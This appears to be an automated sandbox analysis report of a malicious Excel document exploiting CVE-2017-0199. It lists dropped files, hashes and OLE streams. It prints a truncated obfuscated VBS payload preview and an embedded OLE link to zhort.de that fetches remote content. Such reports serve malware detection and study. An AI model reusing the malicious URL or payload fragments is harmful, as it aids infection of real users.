                                                                              SHA1:AB41229FE35C7433B50F4CB0E464404DD7D84D6D
                                                                              SHA-256:3D4C19E074FCDAB40340F1337650BC01815A4DB76653B3D42A6FE93568C69E7F
                                                                              SHA-512:6A9ECB42DEF75A47F21BDEAEEABA7329E43DFE399CF6A8E0A22B9C53B5AF7F181DECC08131B942CC0910262B6C6B3B775DA09DFC3B7BD34A9A2C031267C80ED3
                                                                              Malicious:false
                                                                              Preview:[folders]..UlEYs1.url=0..zhort.de.url=0..

                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\zhort.de.url

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<https://zhort.de/>), ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):43
                                                                              Entropy (8bit):4.340891860212397
                                                                              Encrypted:false
                                                                              SSDEEP:3:HRAbABGQYm2fzD:HRYFVm4H
                                                                              MD5:7B430E77026D35F4B4E760DB85B70575
                                                                              SHA1:13125F9685E08DC3EB0D20E9EEA8092E8BC052ED
                                                                              SHA-256:8BEF7BE05D45AE0CCA841BBF85E3FF266942452379B166A211213680FBDDD012
                                                                              SHA-512:C733F156EECC928A2557044D5D5490DE9653B0EFD8C68F96AA81B4BB6E333C81BBAAA573C09B47C5B0AEBDDEF122D6A1EB4BE3E0F6E7C92FE95D1309F3AAC418
                                                                              Malicious:true
                                                                              Preview:[InternetShortcut]..URL=https://zhort.de/..

                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):162
                                                                              Entropy (8bit):2.503835550707525
                                                                              Encrypted:false
                                                                              SSDEEP:3:vrJlaCkWtVyn5bGa/uWxCiWXhlllln:vdsCkWtib9/PhSdl
                                                                              MD5:1BF7D217D8EE7C7A29943959D1D47B61
                                                                              SHA1:A70BEE6CD9AD6550D00223C6255D45E60AACB23E
                                                                              SHA-256:AA58A5C81D40DF3D595D132FB33B003CD754D13B19624B1008807C803D89BFFE
                                                                              SHA-512:47D0F3270189629CA6499973854FC7F00A1843891C9D82B9C5AB95BE455A079D3990C1D2CCA8E3B3A102E10146FB118EDD44B58A7B7701D5A0B88A4E66200FFD
                                                                              Malicious:false
                                                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                              C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS

                                                                              Download File
                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):182970
                                                                              Entropy (8bit):3.8053382344283673
                                                                              Encrypted:false
                                                                              SSDEEP:3072:JOEWBwVroEh21gt5pIGw/tS7tKxXnQhp85POf8DyVG:QE3roEh2sUXO85uyyQ
                                                                              MD5:E4D3D857EA66D66052DB0FA95DEC7FEA
                                                                              SHA1:3A16FC72C17FBD808F86FA9F5661A35165CD3B23
                                                                              SHA-256:3DA9CF3BD94658AE0D6C78C441C3146DD1348D7AA8EE084BBAD0B987BC138E46
                                                                              SHA-512:077C4CE61FE80C17E025354BE67916A15423B1A795A0B591D111E0911ED0B5D4BA4C62E770EC130AC48BC5D2D38EE516D312054972FAD4936828A04D019FE00D
                                                                              Malicious:true
                                                                              Preview:......K.c.a.z.A.x.m.x.U.A. .=. .".Q.h.p.j.b.A.b.W.h.K.".....P.i.L.L.P.i.i.A.O.W. .=. .".i.i.C.t.h.B.L.L.W.q.".....i.L.h.U.i.W.z.J.g.k. .=. .".z.h.L.L.U.W.U.q.c.G.".....s.L.K.K.n.x.K.W.r.Z. .=. .".a.h.K.G.O.G.G.Z.O.T.".....A.p.L.i.o.K.o.f.u.h. .=. .".m.K.N.b.R.W.P.L.a.x.".....i.N.W.W.z.a.t.e.N.W. .=. .".P.N.p.n.f.m.Z.l.c.G.".....u.o.a.R.R.G.b.p.i.x. .=. .".W.L.l.W.q.L.c.u.o.c.".........Q.N.q.L.B.n.L.Z.P.e. .=. .".A.e.g.c.N.O.e.d.G.z.".....l.H.e.W.U.x.G.P.l.K. .=. .".L.A.L.f.R.K.c.T.r.i.".....h.m.l.U.W.m.b.L.i.k. .=. .".o.s.G.c.N.c.x.W.c.a.".....b.a.n.a.g.l.y.p.h.a.A.q.u.k.e.G.l. .=. .".K.K.m.L.p.u.f.L.h.P.".....h.W.G.N.W.Z.G.i.d.p. .=. .".a.n.a.g.l.y.p.h.a.q.b.o.f.W.k.K.Z.".....f.A.W.B.c.H.f.m.B.c. .=. .".O.i.n.i.i.f.A.h.e.B.".....K.z.G.L.N.i.u.v.d.p. .=. .".c.U.s.f.L.U.k.l.k.B.".....I.L.z.e.n.K.o.h.L.S. .=. .".a.n.a.g.l.y.p.h.a.a.W.Z.K.L.f.L.k.".....R.z.i.B.k.S.L.b.K.v. .=. .".N.l.B.x.U.k.C.e.W.i.".....m.h.q.k.n.G.b.L.W.q. .=. .".Q.z.L.N.u.j.W.L.o.A.".........G.c.x.L.W.L.K.h.p.K. .=. .

                                                                              C:\Users\user\Desktop\F9430000

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 21:29:51 2024, Security: 1
                                                                              Category:dropped
                                                                              Size (bytes):552448
                                                                              Entropy (8bit):7.9897028436241655
                                                                              Encrypted:false
                                                                              SSDEEP:12288:rI4YmApPSP6hcAw2jnk/P/I8zqUfHbStSO3g7koy:yRSP6mAwAkX/I8WUDOBw7
                                                                              MD5:2BEAD29440CC9DBA59A90BB5B8FECEB9
                                                                              SHA1:47ABE6571D33AFF8E065458E5D64699D7A16C138
                                                                              SHA-256:8B508C4D0662C20AE32EB1870425B66F5CEC9AE5345BD17ACFAC16DD779DFEF8
                                                                              SHA-512:95F062B0267D532F4D603F4BA64CB783D298577A8F604A2DF8AE670198B67F1499726D76554608B7F389A68501F60C90AB936D3621FD71C83EA2380A994282E5
                                                                              Malicious:false
                                                                              Preview:......................>.......................................................d.......f.......h.......j...........................................................................................................................................................................................................................................................................................................................................................................................................................4.......5............................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...e.......f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                              C:\Users\user\Desktop\F9430000:Zone.Identifier

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:false
                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                              C:\Users\user\Desktop\SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xls (copy)

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 21:29:51 2024, Security: 1
                                                                              Category:dropped
                                                                              Size (bytes):552448
                                                                              Entropy (8bit):7.9897028436241655
                                                                              Encrypted:false
                                                                              SSDEEP:12288:rI4YmApPSP6hcAw2jnk/P/I8zqUfHbStSO3g7koy:yRSP6mAwAkX/I8WUDOBw7
                                                                              MD5:2BEAD29440CC9DBA59A90BB5B8FECEB9
                                                                              SHA1:47ABE6571D33AFF8E065458E5D64699D7A16C138
                                                                              SHA-256:8B508C4D0662C20AE32EB1870425B66F5CEC9AE5345BD17ACFAC16DD779DFEF8
                                                                              SHA-512:95F062B0267D532F4D603F4BA64CB783D298577A8F604A2DF8AE670198B67F1499726D76554608B7F389A68501F60C90AB936D3621FD71C83EA2380A994282E5
                                                                              Malicious:false
                                                                              Preview:......................>.......................................................d.......f.......h.......j...........................................................................................................................................................................................................................................................................................................................................................................................................................4.......5............................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...e.......f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                              C:\Users\user\Desktop\~$SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:data
                                                                              Category:modified
                                                                              Size (bytes):165
                                                                              Entropy (8bit):1.4377382811115937
                                                                              Encrypted:false
                                                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                              Malicious:true
                                                                              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                              Static File Info

                                                                              General

                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 11:53:06 2024, Security: 1
                                                                              Entropy (8bit):7.969139072187488
                                                                              TrID:
                                                                              • Microsoft Excel sheet (30009/1) 47.99%
                                                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                              File name:SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx
                                                                              File size:548'864 bytes
                                                                              MD5:4d86c48b5d9f043b6e0b1ef3d2c7bdd4
                                                                              SHA1:9206cc3a88ac7f737bdac86649905a9978443109
                                                                              SHA256:33ac27d5d62b88cda7ee122abcd3209306e9527ab0b9dea5633572d8f3908bdd
                                                                              SHA512:ebcff9eba21e25dadc2df1f1e2c3f712ff48d96920ff81bc490e79e4cc59a3751667c213f153fc3145a84a9b8fbeb9093c63b0daa9506f532454ad0f5245feb1
                                                                              SSDEEP:12288:4AFGkrsew5HQeDRsdq4oNNxFUYM9eyfDZX4t2sbOeux3:REZFRQeHhN7FU7e4DitZ7o
                                                                              TLSH:81C423983AE1EF37F08368364ED2D0A78680FD160F92CA87B158379EC9FB7557611A05
                                                                              File Content Preview:........................>.......................................................e.......g.......i.......k......................................................................................................................................................

                                                                              File Icon

                                                                              Icon Hash:2562ab89a7b7bfbf

                                                                              Static OLE Info

                                                                              General

                                                                              Document Type:OLE
                                                                              Number of OLE Files:1

                                                                              OLE File "SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx"

                                                                              Indicators
                                                                              Has Summary Info:
                                                                              Application Name:Microsoft Excel
                                                                              Encrypted Document:True
                                                                              Contains Word Document Stream:False
                                                                              Contains Workbook/Book Stream:True
                                                                              Contains PowerPoint Document Stream:False
                                                                              Contains Visio Document Stream:False
                                                                              Contains ObjectPool Stream:False
                                                                              Flash Objects Count:0
                                                                              Contains VBA Macros:True
                                                                              Summary
                                                                              Code Page:1252
                                                                              Author:
                                                                              Last Saved By:
                                                                              Create Time:2006-09-16 00:00:00
                                                                              Last Saved Time:2024-08-28 10:53:06
                                                                              Creating Application:Microsoft Excel
                                                                              Security:1
                                                                              Document Summary
                                                                              Document Code Page:1252
                                                                              Thumbnail Scaling Desired:False
                                                                              Contains Dirty Links:False
                                                                              Shared Document:False
                                                                              Changed Hyperlinks:False
                                                                              Application Version:786432

                                                                              Streams with VBA

                                                                              VBA File Name: Sheet1.cls, Stream Size: 977
                                                                              General
                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                              VBA File Name:Sheet1.cls
                                                                              Stream Size:977
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O p . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 4f 70 c9 f0 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              VBA Code
                                                                              Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                              VBA File Name: Sheet2.cls, Stream Size: 977
                                                                              General
                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                              VBA File Name:Sheet2.cls
                                                                              Stream Size:977
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O p M . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 4f 70 cf 4d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              VBA Code
                                                                              Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                              VBA File Name: Sheet3.cls, Stream Size: 977
                                                                              General
                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                              VBA File Name:Sheet3.cls
                                                                              Stream Size:977
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O p . F . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 4f 70 1d 46 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              VBA Code
                                                                              Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                              VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                                              General
                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                              VBA File Name:ThisWorkbook.cls
                                                                              Stream Size:985
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O p U V . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 .
                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 4f 70 55 56 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              VBA Code
                                                                              Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                              Streams

                                                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                              General
                                                                              Stream Path:\x1CompObj
                                                                              CLSID:
                                                                              File Type:data
                                                                              Stream Size:114
                                                                              Entropy:4.25248375192737
                                                                              Base64 Encoded:True
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                              General
                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                              CLSID:
                                                                              File Type:data
                                                                              Stream Size:244
                                                                              Entropy:2.889430592781307
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                                              General
                                                                              Stream Path:\x5SummaryInformation
                                                                              CLSID:
                                                                              File Type:data
                                                                              Stream Size:200
                                                                              Entropy:3.2503503175049815
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . Z v 8 . . . . . . . . .
                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                              Stream Path: MBD00533CD9/\x1Ole, File Type: data, Stream Size: 468
                                                                              General
                                                                              Stream Path:MBD00533CD9/\x1Ole
                                                                              CLSID:
                                                                              File Type:data
                                                                              Stream Size:468
                                                                              Entropy:5.244530273180288
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . } . . & . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . z . h . o . r . t . . . d . e . / . U . l . E . Y . s . 1 . . . f ! i . 3 ~ l & . . . . P . @ j . ! . . x n . . . . ; 3 = 3 \\ 7 , . e 0 3 . Y . . - u j . . . . . . . . . . . . . . . . . . . I . O . C . t . A . 5 . 8 . I . t . T . D . t . F . y . H . D . f . H . 2 . O . 2 . 0 . s . j . l . 3 . R . S . 1 . d . F . y . U . R . p . F . m . 4 . F . 4 . y . 3 . 3 . v . y . E . j . f . A . 2 . G . 8 . 5 . q . D . J .
                                                                              Data Raw:01 00 00 02 f3 81 fe 7d 99 1b 16 26 00 00 00 00 00 00 00 00 00 00 00 00 94 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 90 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 7a 00 68 00 6f 00 72 00 74 00 2e 00 64 00 65 00 2f 00 55 00 6c 00 45 00 59 00 73 00 31 00 00 00 66 ad 21 ac e6 f6 b5 69 ef 0c 33 7e 88 85 6c 26 20 d2 ca 1e e6 8b 88 e8 f3 ae f6 0a 9b db b5 50
                                                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 530907
                                                                              General
                                                                              Stream Path:Workbook
                                                                              CLSID:
                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                              Stream Size:530907
                                                                              Entropy:7.999203348284179
                                                                              Base64 Encoded:True
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . x i . f . . O : . . / . 7 k . f . 8 } T . ` . . . . . . . . L ; . . . \\ . p . W g . . x ' . ~ T K S B x ] . P q ] g ( . T m < . . R , . \\ . Z . E < y k P . ] Z . . ! C + N e R U . . . . c n C . T k ) B . . . 8 a . . . . . . . = . . . O y . x . . . F ! . . _ G " / . . . r . . . . ? c . . . . . . . . 6 f . . . . . . . = . . . . W 1 . v K B B J 1 , z @ . . . " . . . " . . . . . . . . . . . . . . . . 1 . . . < A . ] . i Y < . x . D . c 1 . . . E . b ] . G .
                                                                              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 78 69 c3 1e 66 d1 86 e3 06 90 e7 4f 3a 98 1b 2e c3 2f 08 c2 db e7 a0 e1 37 d9 c4 6b 13 66 14 38 b0 b6 8b 7d e7 54 f5 d0 82 c0 60 e7 ab 11 8a be e1 00 02 00 b0 04 c1 00 02 00 4c 3b e2 00 00 00 5c 00 70 00 57 a0 ef a7 c7 67 c3 b9 c7 f7 14 aa 78 27 c1 9d 03 7e 9c 54 bc 4b 53 42 78 8a 8c 9d a6 5d
                                                                              Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 525
                                                                              General
                                                                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                              CLSID:
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Stream Size:525
                                                                              Entropy:5.244999892995313
                                                                              Base64 Encoded:True
                                                                              Data ASCII:I D = " { E A 4 B 8 9 5 C - 9 D 4 D - 4 9 F C - 9 D B 9 - 2 7 0 9 F A D B 5 2 E 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 3 3 1 1 C C 6 C 6 C A C 6 C A C
                                                                              Data Raw:49 44 3d 22 7b 45 41 34 42 38 39 35 43 2d 39 44 34 44 2d 34 39 46 43 2d 39 44 42 39 2d 32 37 30 39 46 41 44 42 35 32 45 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                              Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                                              General
                                                                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                              CLSID:
                                                                              File Type:data
                                                                              Stream Size:104
                                                                              Entropy:3.0488640812019017
                                                                              Base64 Encoded:False
                                                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                              Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                                                                              General
                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                              CLSID:
                                                                              File Type:data
                                                                              Stream Size:2644
                                                                              Entropy:3.9994516951323855
                                                                              Base64 Encoded:False
